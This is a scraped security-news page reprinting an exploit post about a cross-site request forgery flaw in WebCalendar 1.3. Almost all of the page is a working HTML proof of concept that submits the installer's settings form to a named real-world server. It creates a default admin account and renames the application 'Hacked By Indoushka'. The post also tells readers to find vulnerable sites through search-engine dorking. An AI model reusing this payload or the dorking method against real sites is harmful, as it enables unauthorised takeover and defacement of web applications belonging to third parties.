Security
Headlines
HeadlinesLatestCVEs

Headline

WebCalendar 1.3 Cross Site Request Forgery

WebCalendar version 1.3 suffers from a cross site request forgery vulnerability.

Packet Storm
#sql#csrf#vulnerability#web#windows#google#js#git#php#auth#firefox#ssl
====================================================================================================================================| # Title     : WebCalendar v1.3 CSRF Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://github.com/craigk5n/webcalendar/archive/master.zip                                                         |  | # Dork      : WebCalendar v1.3                                                                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 173.[+] Set the target site link Save changes and apply . [+] infected file : install/index.php.[+] http://127.0.0.1/q7.3/admin/settings.php.[+] save code as poc.html .[+] <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  "DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">  <head>    <title>WebCalendar Setup Wizard</title>    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />    <script><!-- <![CDATA[      var xlate = [];      xlate['invalidColor'] = 'Invalid Color';      function testPHPInfo() {        var url = "index.php?action=phpinfo";        window.open( url, 'wcTestPHPInfo', 'width=800,height=600,resizable=yes,scrollbars=yes' );      }      function validate( form ) {        // Only check to make sure single-user login is specified        // if in single-user mode.        var          err = '',          form = document.form_app_settings,          listid = 0; // Find id of single user object.        for( i = 0; i < form.form_user_inc.length; i++ ) {          if( form.form_user_inc.options[i].value == 'none' )            listid = i;        }        if( form.form_user_inc.options[listid].selected ) {          if( form.form_single_user_login.value.length == 0 ) {            // No single user login specified.            alert( 'Error: You must specify a\nSingle-User Login.' );            form.form_single_user_login.focus();            return false;          }        }        if( form.form_server_url.value == '' ) {          err += "Server URL is required.\n";          form.form_server_url.select();          form.form_server_url.focus();        }        else if( form.form_server_url.value.charAt(          form.form_server_url.value.length - 1 ) != '/' ) {          err += "Server URL must end with a slash(/).\n";          form.form_server_url.select();          form.form_server_url.focus();        }        if( err != '' ) {          alert( "Error:\n\n" + err );          return false;        }        // Submit form...        form.submit();      }      function auth_handler() {        var          form = document.form_app_settings,          listid = 0; // Find id of single user object.        for( i = 0; i < form.form_user_inc.length; i++ ) {          if( form.form_user_inc.options[i].value == 'none' )            listid = i;        }        if( form.form_user_inc.options[listid].selected ) {          makeVisible( 'singleuser' );        } else {          makeInvisible( 'singleuser' );        }      }      function db_type_handler() {        var          form = document.dbform,          listid = 0,          selectvalue = form.form_db_type.value;        if( selectvalue == 'sqlite' || $db_type == 'sqlite3'            || selectvalue == 'ibase' ) {          form.form_db_database.size = 65;          document.getElementById( 'db_name' ).innerHTML = 'Database Name: Full Path (no backslashes)';        } else {          form.form_db_database.size = 20;          document.getElementById( 'db_name' ).innerHTML = 'Database Name: ';        }      }      function chkPassword() {        var          form = document.dbform,          db_pass = form.form_db_password.value,          illegalChars = /\#/;          // Do not allow #.../\#/ would stop all non-alphanumeric.        if( illegalChars.test( db_pass ) ) {          alert( 'The password contains illegal characters.' );          form.form_db_password.select();          form.form_db_password.focus();          return false;        }      }//]]> -->    </script>    <script src="../includes/js/visible.js"></script>    <style>      body {        margin:0;        background:#fff;        font-family:Arial, Helvetica, sans-serif;      }      table {        border:0;      }      th.header,      th.pageheader,      th.redheader {        background:#eee;      }      th.pageheader {        padding:10px;        font-size:18px;      }      th.header,      th.redheader {        font-size:14px;      }      th.redheader,      .notrecommended {        color:red;      }      td {        padding:5px;      }      td.prompt,      td.subprompt {        padding-right:20px;        font-weight:bold;      }      td.subprompt {        font-size:12px;      }      div.nav {        margin:0;        border-bottom:1px solid #000;      }      div.main {        margin:10px;      }      li {        margin-top:10px;      }      doc.li {        margin-top:5px;      }      .recommended {        color:green;      }    </style>  </head>  <body onload="auth_handler();">    <table border="1" width="90%" class="aligncenter">      <th class="pageheader" colspan="2">WebCalendar Installation Wizard Step 4</th>      <tr>        <td colspan="2" width="50%">This is the final step in setting up your WebCalendar Installation.</td>      </tr>      <th class="header" colspan="2">Application Settings</th>      <tr>        <td colspan="2">          <ul><li>HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select 'Web Server' from the 'User Authentication' choices below.</li></ul>        </td>      </tr>      <tr>        <td>          <table width="75%" class="aligncenter">            <tr>            <form action="http://phase.ups-tlse.fr/webcalendar/install/index.php?action=switch&page=4" method="post" enctype='multipart/form-data' name="form_app_settings">              <input type="hidden" name="app_settings" value="1" />              <td class="prompt">Create Default Admin Account:</td>              <td>                <input type="checkbox" name="load_admin" value="Yes" />                <span class="notrecommended"> (Admin Account Not Found)</span>              </td>            </tr>            <tr>              <td class="prompt">Application Name:</td>              <td><input type="text" size="40" name="form_application_name" id="form_application_name" value="Hacked By Indoushka" /></td>            </tr>            <tr>              <td class="prompt">Server URL:</td>              <td><input type="text" size="40" name="form_server_url" id="form_server_url" value="http://phase.ups-tlse.fr/webcalendar/" /></td>            </tr>            <tr>              <td class="prompt">User Authentication:</td>              <td>                <select name="form_user_inc" onChange="auth_handler()">                  <option value="user.php" selected="selected">Web-based via WebCalendar (default)</option>                  <option value="http">Web Server (not detected)</option>                  <option value="user-imap.php">IMAP</option>                  <option value="none" >None (Single-User)</option>                </select>              </td>            </tr>            <tr id="singleuser">              <td class="prompt">&nbsp;&nbsp;&nbsp;Single-User Login:</td>              <td><input name="form_single_user_login" size="20" value="" /></td>            </tr>            <tr>              <td class="prompt">Read-Only:</td>              <td>                <input name="form_readonly" value="true" type="radio" />Yes&nbsp;&nbsp;&nbsp;&nbsp;                <input name="form_readonly" value="false" type="radio" checked="checked" />No              </td>            </tr>            <tr>              <td class="prompt">Environment:</td>              <td>                <select name="form_mode">                  <option value="prod" selected="selected">Production</option>                  <option value="dev">Development</option>                </select>              </td>            </tr>          </table>        </td>      </tr>    </table>    <table width="80%" class="aligncenter">      <tr>        <td class="aligncenter">              <input name="action" type="button" value="Save Settings" onClick="return validate();" />              <input type="button" value="Logout" onclick="document.location.href='index.php?action=logout'" />            </form>        </td>      </tr>    </table>  </body></html>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution